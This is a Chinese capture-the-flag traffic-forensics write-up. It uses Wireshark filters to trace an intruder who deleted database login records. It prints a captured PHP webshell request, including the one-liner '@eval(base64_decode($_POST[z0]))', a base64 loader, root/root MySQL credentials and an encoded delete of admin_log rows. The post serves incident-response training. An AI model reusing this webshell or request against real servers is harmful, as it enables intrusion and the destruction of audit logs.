专栏首页黑白安全『流量分析溯源』有人删除了数据库中的登录记录,找到攻击者境内的IP地址。

『流量分析溯源』有人删除了数据库中的登录记录,找到攻击者境内的IP地址。

前言

题目地址:https://www.mozhe.cn/bug/detail/NDU3RnFGTitFdUlaOXNlNFp6QzUydz09bW96aGUmozhe

背景介绍:某公司安全工程师抓取到一段Wireshark数据包,发现有人删除了数据库中的登录记录,找到攻击者境内的IP地址。

使用工具:WireShark

WireShark流量分析

首先打开 23.pcapng 这个流量数据包:

由上图可见,流量有上万条数据包!那么如何在上万条数据流里找到我们想要的信息呢?

我们先来分析题目的要求:发现有人删除了数据库中的登录记录,找到攻击者境内的IP地址!

重点一:删除了数据库中的登陆记录

重点二:攻击者的IP是境内的

由这两点我们就可以大概的了解了攻击者的手法:攻击者登陆到了数据库,然后利用SQL语法对数据库的数据进行了删除!

而我们知道,在一些常规的数据库SQL语法中,删除数据库的语句是:delete、drop...等等。那么这样我们就能缩小范围进行筛选了!

找到PHP脚本木马

PS:按照入侵的流程,想要登陆到数据库那么只有两种方式:

第一种:通过WEB网站入侵到服务器拿到数据库的配置信息从而登陆到数据库

第二种:通过弱口令对数据库进行暴力破解从而登陆到数据库

第三种:通过未授权访问,由于运维人员的错误配置导致黑客能够未授权的登陆到数据库

我首先是过滤了一下HTTP协议的POST请求查看有那些提交的数据包:

http.request.method=="POST"

由上图可见,我通过过滤 HTTP 协议的 POST 请求发现了有一个木马文件:xiaoma.php

既然他删除了他的日志记录,那么我们就从最后一条有关于 xiaoma.php 这个请求文件数据包进行分析:最后一条的时间线是 17.257603,是第 7143 条数据:

分析流量找到删除数据库登陆记录的IP

由上图可见,我们点开 Hypertext Transfer Protocol 这一栏,我们可以看到 HTTP 协议的数据:

Hypertext Transfer Protocol
    POST /uploads/upload/xiaoma.php HTTP/1.1\r\n
        [Expert Info (Chat/Sequence): POST /uploads/upload/xiaoma.php HTTP/1.1\r\n]
            [POST /uploads/upload/xiaoma.php HTTP/1.1\r\n]
            [Severity level: Chat]
            [Group: Sequence]
        Request Method: POST
        Request URI: /uploads/upload/xiaoma.php
        Request Version: HTTP/1.1
    X-Forwarded-For: 156.27.191.141\r\n
    Referer: http://123.108.208.144\r\n
    Content-Type: application/x-www-form-urlencoded\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n
    Host: 123.108.208.144\r\n
    Content-Length: 957\r\n
        [Content length: 957]
    Connection: Close\r\n
    Cache-Control: no-cache\r\n
    \r\n
    [Full request URI: http://123.108.208.144/uploads/upload/xiaoma.php]
    [HTTP request 1/1]
    [Response in frame: 7144]
    File Data: 957 bytes

其中目标还伪造了一个 IP :X-Forwarded-For: 156.27.191.141(我们先记录)

接着往下看这条 POST 表单数据:HTML Form URL Encoded: application/x-www-form-urlencoded

HTML Form URL Encoded: application/x-www-form-urlencoded
    Form item: "d76R3478" = "@eval(base64_decode($_POST[z0]));"
        Key: d76R3478
        Value: @eval\001(base64_decode($_POST[z0]));
    Form item: "z0" = "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJd
        Key: z0
        Value [truncated]: QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJ
    Form item: "z1" = "localhost"
        Key: z1
        Value: localhost
    Form item: "z2" = "root"
        Key: z2
        Value: root
    Form item: "z3" = "root"
        Key: z3
        Value: root
    Form item: "z4" = "mysql"
        Key: z4
        Value: mysql
    Form item: "z5" = "ZGVsZXRlIGZyb20gYWRtaW5fbG9nIHdoZXJlIGlwID0gIjEyMy40LjE0LjEyNiI7"
        Key: z5
        Value: ZGVsZXRlIGZyb20gYWRtaW5fbG9nIHdoZXJlIGlwID0gIjEyMy40LjE0LjEyNiI7

由上图的数据可见,我们由此获得了几点重要的信息:

信息一:目标的一句话木马是

@eval(base64_decode($_POST[z0]));

信息二:目标使用了弱口令登陆到了MySQL数据库里

 Form item: "z1" = "localhost"
        Key: z1
        Value: localhost
    Form item: "z2" = "root"
        Key: z2
        Value: root
    Form item: "z3" = "root"
        Key: z3
        Value: root
    Form item: "z4" = "mysql"
        Key: z4
        Value: mysql

信息三:目标加密了一些数据,其中加密方式是 base64 加密

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 百度知道隐藏信息查询

    可以看到查询账号的百度知道的所有回复。 百度不收录百度知道答主的部份回复,而且删除过了的提问,还是能看到回复。

    周俊辉
  • IT 公司的 16 名员工被逮捕,缘起在 30 个城市的网吧部署挖矿恶意软件

    这几年比特币等虚拟货币被炒得火热,很多人纷纷投入挖矿(利用电脑硬件计算出比特币的位置并获取比特币)大军。但是,挖矿需要大量的电脑,也很耗电,成本不菲。

    周俊辉
  • 遭黑客攻击隐忧尚存 日本约6成地方政府网站安全加密措施落后

    环球网报道,根据日本一项民间调查,日本全国6成地方政府对作为官网安全对策之一的“https加密”应对落后,网站用户的通信内容有被怀恶意的黑客盗看的隐忧。在日本中...

    周俊辉
  • Python漫谈

    列表切片的标准是lst[a:b:c] a是列表切片的开头,b是切片的结尾,c是step。 这里的表示从第一个元素开始,按照每隔一步,到第三个元素结束

    哒呵呵
  • IM开发基础知识补课(六):数据库用NoSQL还是SQL?读这篇就够了!

    随着互联网大数据时代的到来,越来越多的网站、应用系统都需要支撑大量甚至海量数据存储,同时还伴有高并发、高可用、高可扩展等特性要求。

    JackJiang
  • 基本的排序

    ShenduCC
  • 数据库基本知识

      字段、记录、表、约束(主键、外键、唯一键、非空、check、default、触发器)

    爱学习的孙小白
  • iOS加密方式:RSA DES MD5

    DES:对称加密(服务器和客户端公用同一个秘钥),缺点:一旦被抓包破解了秘钥,就能破解所有的传递信息

    Python疯子
  • 剑指offer--调整数组顺序使奇数位于偶数前面

    题目描述 输入一个整数数组,实现一个函数来调整该数组中数字的顺序,使得所有的奇数位于数组的前半部分,所有的偶数位于位于数组的后半部分,并保证奇数和奇数,偶数...

    AI那点小事
  • 字符串--Kmp详解+代码

            给定文本串text和模式串pattern,要求从文本串中找到模式串第一次出现的位置。

    用户2965768

扫码关注云+社区

领取腾讯云代金券